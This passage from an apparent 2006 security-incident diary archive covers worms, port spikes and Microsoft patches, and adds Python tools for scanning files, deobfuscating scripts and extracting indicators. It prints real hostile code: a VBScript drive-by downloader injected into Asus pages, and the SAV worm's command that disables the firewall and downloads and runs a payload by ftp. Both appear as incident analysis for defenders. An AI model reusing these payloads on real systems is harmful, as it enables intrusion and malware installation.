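        "<dc:creator>erp-batch</dc:creator><cp:lastModifiedBy>purchasing-pc-07</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/worksheets/sheet1.xml", sheet1)
        z.writestr("xl/worksheets/sheet2.xml", sheet2)
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


def scan_xlsx(data: bytes) -> dict:
    """Report what a recipient will not see in the grid but can still read from
    the file: hidden sheets, hidden rows/columns (with their cell text), metadata."""
    findings = {"hidden_sheets": [], "hidden_rows": {}, "hidden_cols": {},
                "hidden_text": [], "metadata": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            for sheet in wb.iter(q(NS_MAIN, "sheet")):
                # state defaults to "visible"; "hidden" and "veryHidden" are both invisible
                if sheet.get("state", "visible") != "visible":
                    findings["hidden_sheets"].append(sheet.get("name"))
        for name in sorted(names):
            if not (name.startswith("xl/worksheets/") and name.endswith(".xml")):
                continue
            ws = ET.fromstring(z.read(name))
            rows = [r for r in ws.iter(q(NS_MAIN, "row")) if r.get("hidden") == "1"]
            cols = [c.get("min") for c in ws.iter(q(NS_MAIN, "col")) if c.get("hidden") == "1"]
            if rows:
                findings["hidden_rows"][name] = [r.get("r") for r in rows]
                for r in rows:
                    # inline strings only; shared strings would need xl/sharedStrings.xml too
                    findings["hidden_text"].extend(t.text for t in r.iter(q(NS_MAIN, "t")) if t.text)
            if cols:
                findings["hidden_cols"][name] = cols
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            for key, tag in (("creator", q(NS_DC, "creator")),
                             ("lastModifiedBy", q(NS_CP, "lastModifiedBy"))):
                el = core.find(tag)
                if el is not None and el.text:
                    findings["metadata"][key] = el.text
    return findings


def is_safe_to_send(findings: dict) -> bool:
    """Gate for an outbound mail hook: refuse the attachment while anything is hidden."""
    return not (findings["hidden_sheets"] or findings["hidden_rows"] or findings["hidden_cols"])


if __name__ == "__main__":
    result = scan_xlsx(build_sample_xlsx())
    for key, value in result.items():
        print(f"{key}: {value}")
    print("safe to send:", is_safe_to_send(result))
```

Hooked into an outbound mail gateway, the gate above would have bounced the 3.7 MB "one line" forecast back to the sender; the metadata check is the cheaper cousin of the same problem, since the creator and last-modified-by names travel with the file whether or not anyone meant them to.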

Start the New Year off right: take a look around your organization and see if your users are doing stupid stuff.  In a time when we should all be looking closely at any Word documents that we get, how many of the .DOC files that your company sends or receives could simply be communicated as text? 

I strongly believe that 2006 will be seen as a turning point in security: the year when application-based, live-data attacks began to flourish.  Get ahead of the game and take a cold, hard look at the avenues for data-borne attacks against your organization.  Wean your users from unnecessary reliance on formatted data when plain-old text will do.

Remember: when Moses came down off the mountain, it was with text chiseled into stone; not DHTML, JavaScript, and animated GIFs. 

If text is good enough for God, then it's good enough for you.  ;-)

Tom Liston - Intelguardians
Handler on Duty


Published: 2006-12-18

Skype worm

We are hearing some details of a new worm spreading via Skype IM, it appears to be using a custom (or at least unusual) packer and the network traffic appears encrypted as well. Please send us any info you might have on it.


Published: 2006-12-18

4242/TCP Activity is up

We've heard reports of lots of activity on port 4242/TCP recently. Is anyone else seeing this trend? If so when did you start seeing it and have you looked into its source or cause?


Published: 2006-12-18

ORDB Shutting down

The Open Relay DataBase (ORDB) announced today that it is shutting down.
Please don't send us rants on whether you loved or hated the ORDB, we have an automated tool for that. HOWEVER, if you are a mail admin and you have been using their database for your blocklist, you'll want to stop doing so now: once the DNS zone is gone, lookups against it will no longer return a useful answer and may just add delay to every inbound message. To quote the site:
" DNS and the mailing lists will vanish today, December 18, 2006. This website will vanish by December 31, 2006."


Published: 2006-12-17

Ping floods at multiple sites

We're seeing reports of ongoing ping floods at multiple sites.  They appear to be getting low tens of thousands of echo requests (60 byte packets, no payload) per minute.
If you're seeing a similar packet flow, please let us know.  In particular, we'd like to get a sense of how many source IP's appear to be generating the traffic and a packet capture of a few of the packets.

Update: The original poster has reported that the original reporting sites have seen traffic fall off.  At this point we don't have conclusions about what was happening, but at least it appears to have been a focused attack.  Thanks to the people who wrote in with data and suggestions for interpretation.


Published: 2006-12-16

Virus spreads from Asus Server

Robert shared with us a report of drive-by downloads injected into Asus pages:

This is definitely not the first such case. Websites that are not properly secured are a favourite platform for attackers to launch attacks from.

Our handler Lenny has a de-obfuscated version of the VBScript that triggered the download:

<script language="VBScript">
  ' Swallow every runtime error so a failed step never alerts the user
  on error resume next
  ' Strings are split into fragments to defeat simple signature matching;
  ' they are reassembled with & further down
  clID1  = "clsi"
  clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"   ' RDS.DataSpace (MDAC) control, patched in MS06-014
  XML1   = "Mic"
  XML2   = "rosoft.XMLHTTP"                            ' Microsoft.XMLHTTP
  AdoSqa1 = "Adodb.S"
  AdoSqa2 = "tream"                                    ' Adodb.Stream
  oGet   = "GET"
  fname1 = "AdCount.com"                               ' local name for the dropped binary
  SFO    = "Scripting.FileSystemObject"
  SApp   = "Shell.Application"
  dl     = "http://www.yyc8.com/script/src/rss3.css"  ' payload disguised as a stylesheet
  ' RDS.DataSpace.CreateObject instantiates arbitrary COM objects from the page
  Set df = document.createElement("object")
  df.setAttribute "classid", clID1&clID2
  Set x  = df.CreateObject(XML1&XML2,"")
  Set S  = df.createobject(AdoSqa1&AdoSqa2,"")
  S.type = 1                                           ' adTypeBinary
  x.Open oGet, dl, False                               ' synchronous download of the payload
  Set F   = df.createobject(SFO,"")
  Set tmp = F.GetSpecialFolder(2)                      ' 2 = TemporaryFolder
  fname1  = F.BuildPath(tmp,fname1)
  S.write x.responseBody
  S.savetofile fname1,2                                ' 2 = overwrite if present
  Set Q  = df.createobject(SApp,"")
  Q.ShellExecute fname1,"","","open",0                 ' run it with a hidden window
</script>
<title>Internet Explorer</title>
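The script above hides its strings by splitting them and rejoining them with &. Constant-folding those assignments is the first, mechanical step in de-obfuscating pages like this one. Below is an added example, my code rather than Lenny's tooling or anything from the page that served the script; it takes the de-obfuscated script above as its sample input, folds every expression made only of string literals and already-known string variables, and rewrites the script with the results in place, leaving everything it cannot fold (object creation, method calls) untouched.

```python
import re

# Sample input: the de-obfuscated script from the entry above, tags removed.
SAMPLE = '''
on error resume next
clID1  = "clsi"
clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet   = "GET"
fname1 = "AdCount.com"
SFO    = "Scripting.FileSystemObject"
SApp   = "Shell.Application"
dl     = "http://www.yyc8.com/script/src/rss3.css"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x  =  df.CreateObject(XML1&XML2,"")
set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
S.type = 1
x.Open oGet, dl, False
set F   = df.createobject(SFO,"")
set tmp = F.GetSpecialFolder(2)
fname1  = F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
set Q  = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
'''

ASSIGN_RE = re.compile(r"^\s*(?:set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.I)
STRING_RE = re.compile(r'"((?:[^"]|"")*)"')            # VBScript escapes " by doubling it
SPLIT_RE = re.compile(r'("(?:[^"]|"")*")')              # capturing group keeps literals on split
# a run of identifiers joined by &, not preceded by "." (so method names are left alone)
CONCAT_RE = re.compile(r"(?<![\w.])[A-Za-z_]\w*(?:\s*&\s*[A-Za-z_]\w*)*")


def split_amp(expr):
    """Split on & operators that sit outside string literals."""
    parts, cur, in_str = [], "", False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "&" and not in_str:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    parts.append(cur.strip())
    return parts


def evaluate(expr, consts):
    """Fold an expression of string literals, known string variables and &.
    Returns None if any operand is something else (a call, a number, ...)."""
    value = ""
    for part in split_amp(expr):
        m = STRING_RE.fullmatch(part)
        if m:
            value += m.group(1).replace('""', '"')
        elif part in consts:
            value += consts[part]
        else:
            return None
    return value


def substitute(line, consts):
    """Replace foldable identifier/& runs outside string literals with the literal."""
    def fold(m):
        v = evaluate(m.group(0), consts)
        return '"' + v.replace('"', '""') + '"' if v is not None else m.group(0)
    pieces = SPLIT_RE.split(line)           # even indices: code, odd indices: string literals
    return "".join(p if i % 2 else CONCAT_RE.sub(fold, p) for i, p in enumerate(pieces))


def deobfuscate(script):
    """One ordered pass: rewrite each line with the constants known so far, then
    record the assignment it makes (or forget a variable reassigned to something
    we cannot fold, so later uses are not mislabelled)."""
    consts, out = {}, []
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            name, expr = m.group(1), m.group(2)
            value = evaluate(expr, consts)
            if value is not None:
                consts[name] = value
                out.append(line[:m.start(2)] + '"' + value.replace('"', '""') + '"')
                continue
            consts.pop(name, None)
        out.append(substitute(line, consts))
    return "\n".join(out), consts


if __name__ == "__main__":
    rewritten, consts = deobfuscate(SAMPLE)
    print(rewritten)
```

Running it prints the script with `clID1&clID2` replaced by the full clsid string, `XML1&XML2` by "Microsoft.XMLHTTP", and `x.Open oGet, dl, False` by `x.Open "GET", "http://...", False`, which is the form you want to hand to signature writers or to paste into a report. It is deliberately not an interpreter: anything it cannot prove is a constant string it leaves alone, so it cannot be tricked into "executing" the sample.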


Published: 2006-12-16

SAV Worm Update

Attempts on port 2967, associated with the SAV worm, have been increasing over the last few days:

eEye has a nice technical write-up with an analysis of this worm. Check it out when you have a moment.

Symantec has also released virus definitions for this worm:


Published: 2006-12-15

Yahoo Messenger critical update

Last Friday, Yahoo published a security bulletin for Yahoo Messenger on Windows, affecting all versions prior to 2 Nov 2006.  A buffer overflow in an ActiveX component allows remote code execution.  Earlier today, a Secunia bulletin was also published rating this vulnerability 'highly critical'.  Users of Yahoo Messenger are urged to update to the latest version immediately.  According to the Yahoo bulletin, the control that contains the fix has CLSID AA218328-0EA8-4D70-8972-E987A9190FF4 at version 2005.1.1.4 or above.

Yahoo bulletin: http://messenger.yahoo.com/security_update.php?id=120806
Secunia bulletin: http://secunia.com/advisories/23401/
Update: http://messenger.yahoo.com/


Published: 2006-12-14

sav worm and its cc

Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises was:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt on tcp port 12345, which responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service,
creates an ftp command script named "x" that is then run by ftp.exe -s:x
which downloads NL.eXe (from ftpd.3322.org 21211),
the file is then executed and then the x file is deleted.

Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET).

Engine          Version      Update       Result
BitDefender     7.2          12.14.2006   DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal   8.00         12.14.2006   (Suspicious) - DNAScan
eSafe                        12.14.2006   Win32.Polipos.sus
Fortinet                     12.14.2006   suspicious
Ikarus          T3.1.0.26    12.14.2006   Trojan-Downloader.Win32.Zlob.and
Kaspersky                    12.14.2006   no virus found
Norman          5.80.02      12.14.2006   W32/Suspicious_U.gen
Panda                        12.13.2006   Suspicious file
Prevx1          V2           12.14.2006   Malicious
Sophos          4.12.0       12.14.2006   Mal/Behav-009
Sunbelt         2.2.907.0    11.30.2006   VIPRE.Suspicious
All others reported no virus found!

Additional information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
Packers: UPACK
Packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John then reviewed his IDS logs looking for traffic on port 5202, which appears to be the command and control port for this malware, and discovered traffic towards
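The "echo ... >>x; ftp -s:x" one-liner above was a standard dropper idiom of the time, and it is worth decoding mechanically whenever it turns up in an IDS capture or a shell history. Below is an added example, my code and not John's tooling or anything from the original submission, that takes that command line as its sample, rebuilds the ftp script the way ftp.exe -s would read it (the first two non-command lines after "open" are the answers to the user and password prompts), and pulls out the host, port, credentials and file names as indicators.

```python
import re

# Sample input: the command observed in the compromise above, copied from the submission.
SAMPLE_CMD = (
    'cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x'
    '&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x'
    '&ftp.eXe -s:x&NL.eXe&del x"'
)

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)       # echo <text> >(>) <file>
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*-s:(\S+)", re.I)           # ftp -s:<scriptfile>
NETSTOP_RE = re.compile(r"^net\s+stop\s+(.+)$", re.I)
DEL_RE = re.compile(r"^(?:del|erase)\s+(.+)$", re.I)
EXE_RE = re.compile(r"^(\S+\.exe)(?:\s|$)", re.I)


def unwrap_cmd(cmdline: str) -> str:
    """Strip a surrounding cmd.exe /c "..." wrapper if present."""
    m = re.match(r'^\s*cmd(?:\.exe)?\s+/c\s+"?(.*?)"?\s*$', cmdline, re.I)
    return m.group(1) if m else cmdline


def parse_ftp_script(lines):
    """Interpret echoed lines the way ftp.exe -s does: 'open host [port]', then the
    answers typed at the user/password prompts, then transfer commands."""
    info = {"host": None, "port": 21, "user": None, "password": None,
            "binary": False, "downloads": []}
    prompts = []
    for raw in lines:
        parts = raw.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            info["user"] = parts[1]
            info["password"] = parts[2] if len(parts) >= 3 else None
        elif verb in ("bin", "binary"):
            info["binary"] = True
        elif verb in ("get", "recv", "mget"):
            info["downloads"].extend(parts[1:])
        elif verb in ("bye", "quit", "disconnect", "close"):
            break
        elif info["host"] and info["user"] is None and len(prompts) < 2:
            prompts.append(raw.strip())   # username, then password, at the prompts
    if info["user"] is None and prompts:
        info["user"] = prompts[0]
        info["password"] = prompts[1] if len(prompts) > 1 else None
    return info


def analyse_dropper(cmdline: str) -> dict:
    """Walk the &-chained segments, collect each 'echo ... >file' into the script
    it builds, and resolve ftp -s:<file> against that script."""
    result = {"services_stopped": [], "cwd": None, "script_files": {},
              "ftp": None, "executed": [], "deleted": []}
    # a literal & inside quotes would be split too; good enough for these one-liners
    for seg in re.split(r"\s*&&?\s*", unwrap_cmd(cmdline)):
        seg = seg.strip()
        if not seg:
            continue
        if (m := ECHO_RE.match(seg)):
            result["script_files"].setdefault(m.group(2), []).append(m.group(1))
        elif (m := NETSTOP_RE.match(seg)):
            result["services_stopped"].append(m.group(1).strip())
        elif (m := FTP_RE.match(seg)):
            result["ftp"] = parse_ftp_script(result["script_files"].get(m.group(1), []))
        elif (m := DEL_RE.match(seg)):
            result["deleted"].append(m.group(1).strip())
        elif seg.lower().startswith("cd "):
            result["cwd"] = seg[3:].strip()
        elif (m := EXE_RE.match(seg)):
            result["executed"].append(m.group(1))
    return result


def indicators(result: dict) -> list:
    """Flatten the analysis into indicators for blocking and hunting."""
    out = []
    if result["ftp"] and result["ftp"]["host"]:
        out.append(f"ftp://{result['ftp']['host']}:{result['ftp']['port']}")
        out.extend(result["ftp"]["downloads"])
    out.extend(result["executed"])
    return sorted(set(out))


if __name__ == "__main__":
    analysis = analyse_dropper(SAMPLE_CMD)
    for key, value in analysis.items():
        print(f"{key}: {value}")
    print("indicators:", indicators(analysis))
```

The "services_stopped" field is the part worth alerting on by itself: a command line that stops SharedAccess (the Windows Firewall/ICS service) before doing anything else is hostile regardless of what follows.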


Published: 2006-12-14

Port 7212 spike

A reader wrote in that he was seeing a large spike in port 7212.
I checked our port statistics and found we had had two spikes, one on the 14th of November and one on the 8th of December.
Nov 14th we saw 62k targets and 143k records with only 105 sources. That is a 7x increase in records, a 15x increase in targets, and the sources went down from the previous day.
On Dec 8th we saw 76k records against 27k targets with only 88 sources. That is a 3x increase in records, a 10x increase in targets, and the sources went down from the previous day.

From the user comments on the SANS port statistics:

"There are certain older versions of GhostSurf which fire up by default as a wide-open proxy,"
Lawrence Baldwin
Write-up on ghostsurf open proxy from November 23, 2005

But based on packets provided by Daniel F. it appears to be p2p related.
Here is a write-up by Daniel and the packet contents.

"Earlier today a significant increase of port 7212/TCP (unknown) scanning
against relatively large segments from networks in North America,
Sweden, and France was noted.

All probes analyzed thus far appear to be associated with a Peer-to-Peer
(P2P) application framework known as
"GnucDNA" (http://www.gnucleus.com/GnucDNA/).
And two sanitized payloads:

Host: [targeted darknet address removed]:7212
User-Agent: Fildelarprogram (GnucDNA
Listen-IP: [.se host address removed]:17799
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0

Host: [targeted darknet address removed]:7212
User-Agent: morph500 (GnucDNA
Listen-IP: [.fr host address removed]:29168
Connection: Keep-Alive
Range: bytes=0-524287
X-Queue: 0.1
X-Features: g2/1.0

So I did a Google search for GET /uri-res/N2R?urn:sha1 and guess what, it's all BearShare, LimeWire and other p2p clients.

So this spike appears to be p2p related, not open proxies. But the question on my mind is why so few sources but so many targets?
After a review of the top source IPs it appears most of this is coming from within China.



Published: 2006-12-14


In response to fellow handler Swa Frantzen's call for ICMP packets yesterday, many of you sent in ICMP traces that we analyzed.  To summarize the responses, many of you are indeed seeing a general uptick in various types of ICMP traffic.  Some people are getting more echo requests, others are getting echo replies, others are getting other types of ICMP.  We haven't found any common thread between any of the submissions.  So it's probably safe for me to say that this isn't a worldwide event with a common source cause.

Some major data breaches announced at UCLA and Boeing put the total number of records exposed in the breaches tracked by privacyrights.org since April 2005 at almost 100 million.  http://www.privacyrights.org/ar/ChronDataBreaches.htm

New vulnerabilities announced in Symantec NetBackup:  http://www.symantec.com/avcenter/security/Content/2006.12.13a.html


Published: 2006-12-13

IBM/ISS protection suites - content update problem

IBM/ISS issued a notice telling customers NOT to apply the latest content update (Proventia G update XPU 1.92 / library 24.53) for most of their Proventia and RealSecure products.  Here is the text of their alert:

"IBM Internet Security Systems has discovered a serious issue that impacts network connectivity in the content update that was released early in the morning on Dec. 13, 2006.  The following Content Updates are being recalled and withdrawn from the Download Center and from the automatic download feature of SiteProtector.  If you have already downloaded these updates, DO NOT APPLY THEM.  If you have applied these updates and can roll-back to a previous update, do so."

Affected products:
*       Proventia(r) Intrusion Prevention Appliance 1.92 (1.2 and above) or older firmware versions 24.53
*       Proventia Integrated Security Appliance 1.92
*       Proventia Intrusion Detection Appliance 24.53
*       RealSecure(r) Network Sensor 24.53
*       Proventia Server 1910 for Windows (SiteProtector SP5/6 Agent Manager Service Packs 6.76/7.76) and 1.92 for Linux
*       RealSecure Server Sensor 24.53
*       Proventia Desktop 1910 (SiteProtector(tm) SP5/6 Agent Manager Service Packs 6.76/7.76)
*       RealSecure Desktop EPW (SiteProtector SP5/6 Agent Manager Service Packs 6.76/7.76)

More information on the ISS knowledgebase article #3819:  https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=3819


Published: 2006-12-12

The missing Microsoft patches

Vulnerabilities that are widely known and/or actively exploited are of great interest to our readers; here we try to keep an overview of them.

Columns: Affected | Known exploits | Impact | Known since | ISC rating(*) (clients / servers)

Affected: Office 2004 vulnerabilities (Mac version)
  Notes: unspecified vulnerabilities fixed in an accidentally released patch. The patch was withdrawn after being exposed to the public and replaced by a patch without the security fixes. (MSRC blog #1, MSRC blog #2)
  Known since: Dec 12th, 2006

Affected: Word unspecified vulnerability #3
  Known exploits: publicly available exploit (MSRC blog)
  Impact: remote code execution
  Known since: Dec 12th, 2006

Affected: Word unspecified vulnerability #2
  Known exploits: used in targeted attacks (MSRC blog #1, MSRC blog #2)
  Impact: remote code execution
  Known since: Dec 10th, 2006
  ISC rating: clients Critical / servers Important

Affected: Word unspecified vulnerability #1
  Known exploits: used in targeted attacks (Microsoft Security Advisory 929433, MSRC blog)
  Impact: remote code execution
  Known since: Dec 5th, 2006
  ISC rating: clients Critical / servers Important

Affected: RPC in Windows 2000 SP4 (UPnP and SPOOLS)
  Known exploits: multiple publicly available exploits
  Known since: Nov 16th, 2006
  ISC rating: Less Urgent

Affected: ADODB.Connection ActiveX
  Known exploits: publicly available exploit (MSRC blog)
  Known since: Oct 24th, 2006
  ISC rating: clients Less Urgent / servers Less Urgent

Affected: Microsoft Windows NAT Helper Components
  Known exploits: publicly available exploit
  Known since: Oct 20th, 2006
  ISC rating: Less Urgent

Affected: PowerPoint 2003
  Known exploits: publicly available exploit (MSRC blog #1, MSRC blog #2)
  Known since: Oct 20th, 2006
  ISC rating: clients Less Urgent / servers Less Urgent

Affected: Server Service memory corruption
  Known exploits: publicly available exploit
  Impact: remote code execution?
  Known since: Jul 19th, 2006
  ISC rating: clients unknown / servers unknown

We will update issues on this page as they evolve.
We appreciate updates

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.

Swa Frantzen -- Section 66


Published: 2006-12-12

Offline Microsoft Patching

Heise brings us "Offline Update 3.0" to do offline installations of Microsoft patches.

Read more about it at: http://www.heise-security.co.uk/articles/80682

Now this is a great concept: you can make a DVD to install the patches before you connect an out-of-date PC to the Internet. If you think you can safely do that without such a tool, take a second and think it through: some of your friends needing a house call might have a USB-connected DSL or cable modem, and therefore no NAT in front of the machine; then take a look at the survival time and think how long it takes to bring a Windows system from original media to fully patched.

So, if you're going to visit parents, family or friends over the holidays, start your preparation now and make that disk today to take along. It'll dramatically improve your response time to the obligatory "Could you take a look at our computer while you're here?" and gives you a safe way to reinstall systems without a hardware-based firewall.

If you have networks that you do not want to connect to the Internet because the risks involved are just too big for the sensitivity of the data involved, this might also become a way to patch those off-line machines.

Swa Frantzen -- Section 66


Published: 2006-12-12

SAV botnet revival ?

It seems like there is a revival going on of the botnet exploiting the Symantec Anti-Virus vulnerability. It was originally reported on by Joel on Nov 27th.

But the traffic scanning for port 2967 is back. It seems new Command and Control centers are active for it as well.

Swa Frantzen -- Section 66


Published: 2006-12-12

Microsoft Office 2004 - Mac OS X updated

Microsoft released their 11.3.1 update for Office 2004 (the Apple Mac version) today as well.

It does contain a security fix for the Word component.


Swa Frantzen -- Section 66


Published: 2006-12-12

MS06-078: 2 Windows Media Format Vulnerabilities (CVE-2006-4702, CVE-2006-6134)

This advisory addresses 2 vulnerabilities in the Windows "Media Format Runtime", which is used by applications that handle Windows Media content.
The unchecked buffer and URL parsing vulnerabilities could result in full system compromise if exploited.
An attacker would create a malicious Advanced Streaming Format (.ASF) file or a malicious Advanced Stream Redirector (.ASX) file and present it to a vulnerable client through a malicious URL, an email attachment, or perhaps a malicious IFRAME or redirect.

These vulnerabilities pose the most risk to systems used for web surfing or for checking email, especially if the user is logged in as Administrator or Internet Explorer is running with an unrestricted zone setting (anything lower than High). MS Outlook's default restrictions might shield a user, but clicking on a URL within an email launches a browser outside of those restrictions.

Note: known exploits have been circulating for CVE-2006-6134 (ASX).

Note that it may take several patches to update a system: Windows Media Player 6.4 is patched separately (KB925398) from the Media Format Runtime (KB923689). It may be a challenge to assess the posture of any given system with regard to these two vulnerabilities short of using the Microsoft tools.

Microsoft Windows Media Format 7.1 through 9.5 Series Runtime on the following operating system versions:
Microsoft Windows 2000 Service Pack 4 - Download the update (KB923689)
Microsoft Windows XP Service Pack 2 - Download the update (KB923689)
Microsoft Windows XP Professional x64 Edition - Download the update (KB923689)
Microsoft Windows Server 2003 or Microsoft Windows Server 2003 Service Pack 1 - Download the update (KB923689)
Microsoft Windows Server 2003 x64 Edition - Download the update (KB923689)
Microsoft Windows Media Format 9.5 Series Runtime x64 Edition on the following operating system versions:
Microsoft Windows XP Professional x64 Edition - Download the update (KB923689)
Microsoft Windows Server 2003 x64 Edition - Download the update (KB923689)
Microsoft Windows Media Player 6.4
Windows 2000 Service Pack 4 - Download the update (KB925398)
Microsoft Windows XP Service Pack 2 - Download the update (KB925398)
Microsoft Windows XP Professional x64 Edition - Download the update (KB925398)
Microsoft Windows Server 2003 or Microsoft Windows Server 2003 Service Pack 1 - Download the update (KB925398)
Microsoft Windows Server 2003 x64 Edition - Download the update (KB925398)

Reference URLs:
Windows Media Format ASF Parsing Vulnerability
Windows Media Format ASX Parsing Vulnerability


Published: 2006-12-12

MS06-076: Windows Address Book Contact Record flaw (CVE-2006-2386)

References: KB923694
Severity:  Highly Important to Workstations, lesser for servers

This update is a cumulative update for Outlook Express versions 5.5 and 6.  It addresses a remote code execution problem involving Windows Address Book (.wab) files.  The vulnerability exists in a component of Outlook Express and could allow an attacker who sends a specially crafted address book file to an unpatched system to take control of that system.  The vulnerability does not provide any privilege escalation: if the attacker successfully exploits it, he or she gains the same access rights as the logged-in user.  So please remember to configure end user accounts with as few privileges as possible.

I would recommend applying this update, or the registry change workaround, to any client workstations as soon as possible.

This update replaces  MS06-016  and MS06-043 as it is a cumulative update.


Published: 2006-12-12

MS06-072: Cumulative Security Update for Internet Explorer (925454)

This bulletin addresses four vulnerabilities in Internet Explorer.   Two allow remote code execution and two allow information disclosure.  According to Microsoft, this does not affect Internet Explorer version 7.  Since many organizations are still running version 6, it is critical that you patch this ASAP if you haven't upgraded yet.  This bulletin replaces MS06-067.  There is also a link provided by Microsoft on possible issues that may arise as a result of this patch:  http://support.microsoft.com/kb/925454

Script Error Handling Memory Corruption Vulnerability - CVE-2006-5579
Previously freed memory is accessed when certain script errors are encountered, which may corrupt memory and allow code execution.

DHTML Script Function Memory Corruption Vulnerability - CVE-2006-5581
When Internet Explorer interprets certain DHTML script function calls on incorrectly created elements, it may corrupt memory in a way that lets an attacker execute arbitrary code.

TIF Folder Information Disclosure Vulnerability - CVE-2006-5578
The issue lies in how Internet Explorer handles drag and drop operations and would allow for files to be accessed on the user's system in the Temporary Internet Files Folder.

TIF Folder Information Disclosure Vulnerability - CVE-2006-5577
This one is similar to the previous vulnerability discussed, however the vulnerability reveals the path to the Temporary Internet Files Folder and allows it to be accessed and files to be retrieved.  According to Microsoft, this requires actions on the user's part for this to occur.


Published: 2006-12-12

MS06-075: csrss local privilege escalation (CVE-2006-5585)

Microsoft has released bulletin MS06-075, which addresses a local privilege escalation vulnerability in the client/server run-time subsystem (csrss), a required component of Windows (in other words, it is always running on every Windows machine), affecting Windows XP SP2 and Windows Server 2003.  Note that Vista, Windows Server 2003 SP1 and Windows 2000 SP4 are reported not to be affected at this time.

We rate this one as important.  If someone can get access to the system via other means (cracked password, etc.), this vulnerability allows that person to elevate their privileges to administrator by running a specially crafted executable.

CVE-2006-5585 (this link isn't live yet)


Published: 2006-12-12

MS06-074: SNMP Buffer Overflow (CVE-2006-5583)

The Simple Network Management Protocol (SNMP) service is vulnerable to a buffer overflow. This service is typically used to manage network devices. Home users are not likely to have this service installed. However, many larger networks use SNMP to control and monitor networked workstations and servers.

According to a note from Dave Aitel, Immunity released an exploit for this vulnerability to its customers.

To disable this service, or to check whether it is running, use the "Services" tab in your Control Panel and make sure the 'SNMP Service' is not running. You will not see an entry for the SNMP service if it is not installed.

This patch is a "patch now" for all networks that use SNMP. The service runs as "system" and a successful exploit would give an attacker full access. The Microsoft bulletin only talks about port 161/UDP for this vulnerability, so one can assume that SNMP trap messages (162/UDP) are not affected.

Common sense SNMP security (regardless of the vulnerability):
  • block port 161/udp and 162/udp at your perimeter (snmpv3 may use tcp).
  • use a hard-to-guess community string (anything but "public").
  • disable snmp listeners if you do not need them.
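To check the second point on the wire, or to see whether a host you own still has a listener answering, it helps to know what a v1/v2c datagram looks like: a BER SEQUENCE holding the version, the community string in the clear, and the PDU. Below is an added example, my code rather than anything from the bulletin or from Microsoft, that builds a GetRequest for sysDescr.0 from scratch, parses such datagrams back (as you would from a 161/udp capture) and flags default community strings. The list of weak strings is an assumption to extend with whatever your own site used to use.

```python
import socket

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest"}
# Assumed list of defaults worth flagging; extend with your own site's old strings.
WEAK_COMMUNITIES = {"public", "private", "community", "snmp", "admin", "cisco"}


def _ber_len(n: int) -> bytes:
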